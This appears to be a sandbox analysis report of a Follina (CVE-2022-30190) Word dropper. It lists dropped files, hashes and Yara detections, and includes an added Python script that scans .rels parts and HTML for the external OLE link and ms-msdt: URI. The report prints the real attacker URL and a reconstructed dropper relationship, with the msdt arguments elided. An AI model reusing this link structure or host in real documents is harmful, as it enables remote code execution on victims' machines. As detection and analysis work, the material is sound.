            • Enable AMSI
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
            • TCP Packets have been reduced to 100
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.28773612475316834
            Encrypted:false
            SSDEEP:24:I3yC/9LC4tB37+KqorUSjnClWnyc8v5TbT/tAZvzKxFcNTRxlQvnS8S9XqJNQSEQ:I35RBzAccmKyTjlJQaxwOr0JZH
            MD5:FF3458BF59CAB2B33042A43FE7571C5E
            SHA1:B8B002E94BF658303BE1DA5E7D5FA7670EA882B7
            SHA-256:E151CF032E1294178D66CF5D065FD8F0C26D27945195FD34738910D25B6A567D
            SHA-512:256C055110B1AA138F19FC4519D05FE158FBCEF88C8E604DECE24FF2AAB6808208E9DED419613436E08DB2429124F131F2E5F81FCDFC3C9C0E1CE1240F0EC212
            Malicious:false
            Reputation:low
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.6745976468464878
            Encrypted:false
            SSDEEP:768:T5K146vqOVHUvJBmtlK2DrxtlK2DrwZPJl/XDr/klmDr/4xtD+DrbtDlDr:Lhw
            MD5:9F01FC48E22641773BC5DB74B89EB0E1
            SHA1:B4985AF395531C350958A267B7D81F78AABA57A2
            SHA-256:0E19C09DC2C68235B7C39C13A81A3125C376D9135267CB003B1057285581374B
            SHA-512:BCA4CA34F6F4DCF49EF55B53FF8C9F1452BCE4A6426B083FC7AFA578CD88C07635E12844AA63319E5CC21128EB2F7FCD1066FD7DAE453A1720333FA41445A9E2
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zM..7..+M....L..NS,...X.F...Fa.q..............................J....@.B.H.............).%5VJ... .....S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.936756154878342
            Encrypted:false
            SSDEEP:3:yVlgsRlzXh4NaPlDpKQclkrI8TcOhFYDZ276:yPblzXeWl0J+c8QGFYDZ22
            MD5:508E494841A8C3839E148679A4937283
            SHA1:668677B7DBA2DBD40A596A200D0176B965BD44AE
            SHA-256:AB0AE8DEF878D06C5F65D16C14B4ACBEE7EED1666584865D90C62E5704B5B48A
            SHA-512:DABFFDCCE773E059F52E137EAE54621AE36E33CB28A5A6A86CC5E323D23A8ACDB3B8B76CB74CC9BFDFC8586A0D2BF553FE63C40F5B1D3CCB197A6721E1ED644A
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.8.2.D.6.D.0.4.A.-.E.2.A.7.-.4.2.F.1.-.8.9.A.6.-.C.F.D.5.7.F.9.E.C.7.6.6.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.28745721354451365
            Encrypted:false
            SSDEEP:48:I3sPRBffmW1AEr12ORQopWi3hI9ahlrq1/Tp9oipEGQO09oipEGQOyH:KoLXYErFHI9aXq1DmbBmbvH
            MD5:5F39A4DAC8039EB065DD8D063640BC4F
            SHA1:BBEA611DA4F133FB3F02C273B60D379060ECC49C
            SHA-256:FA8BE565755B84D32FF994D075AF5002629176DA9771B5CC9C78268C0021BACC
            SHA-512:5B983F376F0146604DA61EBED288E016E4DD43EA1A8971D3953DBC8D1B52B5BD22D88B32628A61EC06C784B14AC2B0A5F65AC8B128F3D84422861B0BE9BFBC2D
            Malicious:false
            Reputation:low
            Preview:......M.eFy...z....H*.O...L..S,...X.F...Fa.q.............................&.....F.~.c...............7..B.Z.../^T.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.22075992709284928
            Encrypted:false
            SSDEEP:48:I3oyQUrB/2aWIeFRmHaaGEW1+7DYd7z1IZuxTV/ZjA/iZjA/J:KoLCjuRQG7ZYuxT/AmAx
            MD5:B53D2E2D585B0857AAFF3A807DDDFE73
            SHA1:309EB90AD24B5FC926D00B6B16A2DE199522114E
            SHA-256:EE3835D8BE77FC46EB661A14ADCC3285582CC8774C8F2617922D99D5A13C29CE
            SHA-512:C8ACE3F93133C5F4C8E257D311DE4F182144F4871EDA19A18DD83BB0E05A433FA37F4440F8DA50C283FD720D6F4860B601B56F91D3C95BF56186674C8DBAE769
            Malicious:false
            Reputation:low
            Preview:......M.eFy...zI...ZSbO.*G..8.S,...X.F...Fa.q..............................p..FG...+@.H.........d....$/H....N..-P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):114
            Entropy (8bit):3.92634307586349
            Encrypted:false
            SSDEEP:3:yVlgsRlz2rZjMWjjic+lIHdhHAWelOVG4R7276:yPblzwWDc19SWzk4t22
            MD5:63BA949A4695972C1A0E4D0BEC674841
            SHA1:6002A36601A9EEE1C8B4667761AF8815D4E6D8C9
            SHA-256:D5D97F1310E4BFA007D830CA4E1953DF22BE1B797B27692712F5C93E6DBC43DB
            SHA-512:2EE603F54070AA54538FCB3F8C541437E1BFA50E3F56380801356069354940FBFCCB116591D59B25D5F435255E0820DBFCB271EF975670FC91BD03D1D7D1A39D
            Malicious:false
            Reputation:low
            Preview:..H..@....b..q....]F.S.D.-.{.E.C.A.F.6.F.F.3.-.F.9.C.F.-.4.9.5.B.-.8.0.D.B.-.8.0.3.5.D.E.A.3.0.9.E.7.}...F.S.D..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:downloaded
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Tobias Michalski, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            IE Cache URL:https://dullghostwhitetwintext.karewen.repl.co/index.html
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:false
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Tobias Michalski, Christian Burkard
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
            Category:dropped
            Size (bytes):10172
            Entropy (8bit):3.928478624213631
            Encrypted:false
            SSDEEP:48:q373cifeyUaIWmBJOhTDOj1WN7M60iIiB7rSwVauLM/Myof9NLRgMy7k3e2kW86J:873xeXaIBckry+Ks8D+plS
            MD5:C349F98D0BBE0D72F9A6E34335918207
            SHA1:B2184C336F95E1ED5F338D1B27D06A4F8E1C535F
            SHA-256:8ACC7CBE7BEB283D3908F418FB5390623F1EB46018F426D4911F5515E786CAA5
            SHA-512:A6DE09C1E4B3947EF4B8BF46B14A3E77AFFB6004EDED3560814720B8304542F1722EFEF83502E0532C76B438015B84200302BE5CE5F8C1228A881F050BE8AE5B
            Malicious:false
            Reputation:low
            Preview:....l...............I...........'...9... EMF.....'..........................8...5.......................................................R...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r....$..`.........../...`.......0...0..................?...........?................l...4........$..0...0...(...0...0..... ......$......................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:HTML document, ASCII text, with very long lines
            Category:dropped
            Size (bytes):5901
            Entropy (8bit):4.701941274629396
            Encrypted:false
            SSDEEP:96:O/iGBF2nPW5mDwID8qImX1I8vHWYMLJJ2lpyffnbTc7Om/EAEwCgEAKKiSe+0glg:OZ5mDwIDukGTlKEHbTcKCZEwCgEzKiSs
            MD5:2C855A56E062B197D4CC9D021DF71219
            SHA1:C3161D4AF43AD3DA1B08FF367C06D12FA7D483D5
            SHA-256:A6F55957542982348EB412B9B49797E1931183A6BF395016885E1294C5A08DBD
            SHA-512:11B94B5B6E3F4AEC38B15BF73A3B6836955980F5A47293266BB1FAA88005C94EBBF57465D02D8D4CF164E3F28236A7190592CA6E8C3E82A98CBF7708CF1DCDC0
            Malicious:true
            Yara Hits:
            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Nasreddine Bencherchali, Christian Burkard
            • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Tobias Michalski, Christian Burkard
            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, Author: Joe Security
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Reputation:low
            Preview:<!doctype html>.<html lang="en">.<head>.<title>.Good thing we disabled macros.</title>.</head>.<body>.<p>.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor...Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit...Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignis
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):5632
            Entropy (8bit):2.181448160411441
            Encrypted:false
            SSDEEP:48:rMTLxD3U2557fpQ0fpQRiVDaU2557fpQAfpQFi:QTLxD3U2TenAVDaU2Ter0
            MD5:4B4FEA476768A33C0BCF51BCDDB2CCD4
            SHA1:80D924A68CBE3D1CAA003D7180A3FB3713A15F30
            SHA-256:675CDC18EB9F7FA3C1C4287FF4C1CFADFB81B54073AF377D5082BD23B0D472CD
            SHA-512:20B06E268A0343D559C140BF525E4C0915EB9B5BDA33D94BC51E5B19EBEE3C725CD2E0D1BF75D34E9E4C984F32E0CA0356D85378CECD8DE1EA44ED38EEB68A24
            Malicious:false
            Reputation:low
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1536
            Entropy (8bit):0.9434685449697431
            Encrypted:false
            SSDEEP:6:FlIcElClbY/z35lEHaAlPrP5llAabK/O3iuzxyn4PxZUtg:Fl7MClcFlEHaAPrzXKzut8GZz
            MD5:4D066506FC8303FE21BD33D70AD15382
            SHA1:FBEB98890B56989FBDD274982690F11DA6EF3B8E
            SHA-256:D210EDD7CC5EEC6A9C3AD9C09B2755B8144C3A5ED44B178FE1EE3A50852E7B38
            SHA-512:05B05479DE9EE50CA74A890D27634A065995D34601343F059B8B66516FAAC79098CB4F9ADABFB3ED5CA763BF67A953260FFAA36D24A3BABC04FBA22BC9541FC5
            Malicious:false
            Preview:....L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.d.u.l.l.g.h.o.s.t.w.h.i.t.e.t.w.i.n.t.e.x.t...k.a.r.e.w.e.n...r.e.p.l...c.o./.i.n.d.e.x...h.t.m.l.!.". .".". .\.b..... . ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
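The field code in the preview above (LINK Package "https://dullghostwhitetwintext.karewen.repl.co/index.html!") and the Yara hits on the cached index.html are the two stages a triage script can check offline: an external OLE relationship in the document's .rels part whose URL ends in "!", and a fetched HTML page that navigates to an ms-msdt: URI. The following Python is an added example written for this page, not the sandbox's own tooling or a published rule. The .rels and HTML inputs are constructed here (the HTML keeps only the URI scheme and a placeholder for the diagnostic arguments), and the 4 KiB size check is a heuristic taken from public Follina analyses, which noted that the HTML stage was padded with filler; treat it as an indicator, not a rule.

```python
"""Offline triage helpers for Follina-style (CVE-2022-30190) droppers.

Added example for this page; not code from the sandbox report or any vendor.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed document.xml.rels: one ordinary internal relationship plus an
# external OLE object whose target ends in "!", as in the report's field code.
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId2" Type="{OLE_TYPE}" '
    'Target="https://dullghostwhitetwintext.karewen.repl.co/index.html!" TargetMode="External"/>'
    "</Relationships>"
)

# Constructed HTML stage: filler text (the real page used lorem ipsum) followed by
# an ms-msdt: navigation. The diagnostic arguments are deliberately left out.
SAMPLE_HTML = (
    "<!doctype html><html><body><p>" + "Lorem ipsum dolor sit amet. " * 200
    + '</p><script>window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param ...";'
    + "</script></body></html>"
)


def build_sample_docx() -> bytes:
    """Assemble a minimal OOXML container carrying SAMPLE_RELS (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_external_targets(docx_bytes: bytes) -> list:
    """List every TargetMode="External" relationship found in any .rels part.

    A hit is marked suspicious when it is an OLE object whose URL ends in
    ".htm!"/".html!"; the trailing "!" is the moniker separator seen on
    Follina droppers. Non-zip input and malformed parts are skipped, not fatal.
    """
    hits = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(docx_bytes))
    except zipfile.BadZipFile:
        return hits  # not an OOXML container: nothing to inspect
    with archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(archive.read(name))
            except ET.ParseError:
                continue  # malformed part: skip rather than abort the scan
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                is_ole = rel.get("Type") == OLE_TYPE
                suspicious = is_ole and re.search(r"\.html?!$", target, re.I) is not None
                hits.append({"part": name, "id": rel.get("Id"), "type": rel.get("Type"),
                             "target": target, "suspicious": suspicious})
    return hits


def scan_html_for_msdt(html: str) -> dict:
    """Flag the traits of the HTML stage: an ms-msdt: URI, the PCWDiagnostic
    troubleshooter id, and a body padded past 4 KiB (heuristic, see lead-in)."""
    return {
        "ms_msdt_uri": re.search(r"ms-msdt:", html, re.I) is not None,
        "pcw_diagnostic": "PCWDiagnostic" in html,
        "padded_over_4k": len(html.encode("utf-8")) > 4096,
    }


if __name__ == "__main__":
    for hit in find_external_targets(build_sample_docx()):
        print(hit)
    print(scan_html_for_msdt(SAMPLE_HTML))
```

To run it against a real sample, pass the bytes of the .docx to find_external_targets and the cached index.html text to scan_html_for_msdt; the relationship scan alone is enough to quarantine a document before any network fetch happens, which is the point of checking the .rels part rather than waiting for the msdt.exe launch.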
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.02572382778486038
            Encrypted:false
            SSDEEP:6:I3DPcrHavxggLRxv26Lt3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP2Hc/tRvYg3J/
            MD5:FAA9C11C3BF4749CF7FFF72F81103637
            SHA1:EA800893E160BDEC41C9E5A208ECDEFD93020DE4
            SHA-256:E4FE523DD900A6A9384D518919DC6F46F67E47BA19062D66BC33738FC9D63D7C
            SHA-512:89283E5CC4D45C886D88EDFF6DD6D81FFBD9DC643925411851E4EAE034BD56F8C9C60C932D6C8DE3A95DB20D06F0F0A4DBF4081CBFBAA03B174D061BA4A79A66
            Malicious:false
            Preview:......M.eFy...zk9ln...H...J../.S,...X.F...Fa.q............................f],....H.^...6...........+9....D..r..0......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):131072
            Entropy (8bit):0.025486724730822925
            Encrypted:false
            SSDEEP:6:I3DPc3vxggLReaZopSdh/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPM6H2PvYg3J/
            MD5:DF1D9A5116232C0278742EE1F191FF0C
            SHA1:0BA0ABF8406B667D8C632F6B3ED6395430A0E8D1
            SHA-256:E4BC1D0AA363F21236E3EDF16C6863CB44D1A3E24B12EC190B33C8F19DF493A9
            SHA-512:35AE70F978C47590A32D185E04AA07C45647D8A9B42E0A1716E6AA1EE075A3F0CFF252FF1853A4C9E474C672F81DAB4022BA3AA37C5FDD1075413668015CB15B
            Malicious:false
            Preview:......M.eFy...z....H*.O...L..S,...X.F...Fa.q............................./g.T.C.B.t.;.............7..B.Z.../^T.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 10:22:03 2022, mtime=Thu Aug 18 10:22:03 2022, atime=Thu Aug 18 10:22:14 2022, length=26614, window=hide
            Category:dropped
            Size (bytes):1019
            Entropy (8bit):4.541555035737997
            Encrypted:false
            SSDEEP:12:8mbA80gXg/XAlCPCHaXNBQtB/XAJX+WuvWQK3juicvbTS3tb4GK/NDtZ3YilMMEh:8mb1k/XT9Sk+mNeHS3ADv3q+u7D
            MD5:16C92C158C9E519DF7E7171A87BA915B
            SHA1:5EA87A76FB2D1CB7776EE3E10902DB4D444EC686
            SHA-256:C3556B03AEDC5348C415F365D63B28E0DF81C86D721A2C8D1937AFDC46879F35
            SHA-512:BEFC41BCB397B893BFD14392992FC02FAD04AD946493E359E20DF11D3136DD145076148BA88B2BE3471D3709EA6EDC9B56EA90A02DC5F246BEE1E26F87CE183F
            Malicious:false
            Preview:L..................F.... ...^{(.....^{(.............g...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U.Z..Desktop.d......QK.X.U.Z*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..g...U.Z .C1ZGT6~1.DOC..L.......U.Z.U.Z*.........................C.1.Z.G.t.6.1.u.G.v...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\377142\Users.user\Desktop\C1ZGt61uGv.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.1.Z.G.t.6.1.u.G.v...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......377142..........D_....3N...W...9G..N..... .....[D_....3N...W...9G
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):72
            Entropy (8bit):4.780851828270855
            Encrypted:false
            SSDEEP:3:bDuMJl+Uqe3TAlmxWtmx3TAlv:bCne3CE3W
            MD5:69F6516C10F77E405479AA56E74F44A0
            SHA1:36194337D22DE7E093B6659C3E3A1C98A2F243CE
            SHA-256:EFAE2CC5C7CBDFF13D4AC0A4FB3F0C0000C52A4E1C9AD499C834F0135A8ECCFB
            SHA-512:3443F8CF1E2804F86512DDDCEC8DF5F0F3683FA2D1E57FC4592E8A13FC7CCC9E402230D71F956DDB8D3873B6825979EB706599CB0F7B2FF32D1A993F31D9451B
            Malicious:false
            Preview:[folders]..Templates.LNK=0..C1ZGt61uGv.LNK=0..[misc]..C1ZGt61uGv.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.503835550707525
            Encrypted:false
